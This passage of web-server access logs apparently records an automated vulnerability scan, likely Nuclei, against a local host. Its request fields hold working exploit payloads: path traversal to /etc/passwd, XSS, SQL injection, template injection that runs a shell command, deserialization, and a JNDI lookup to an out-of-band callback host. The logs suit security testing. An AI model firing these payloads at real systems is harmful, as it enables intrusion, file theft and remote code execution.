HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/_core/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KAY33HDjT1hk6IxIz2rY7KVXd/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://ca285tosmpvbafqg07h0mgr33cw3ke3pd.oast.fun/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 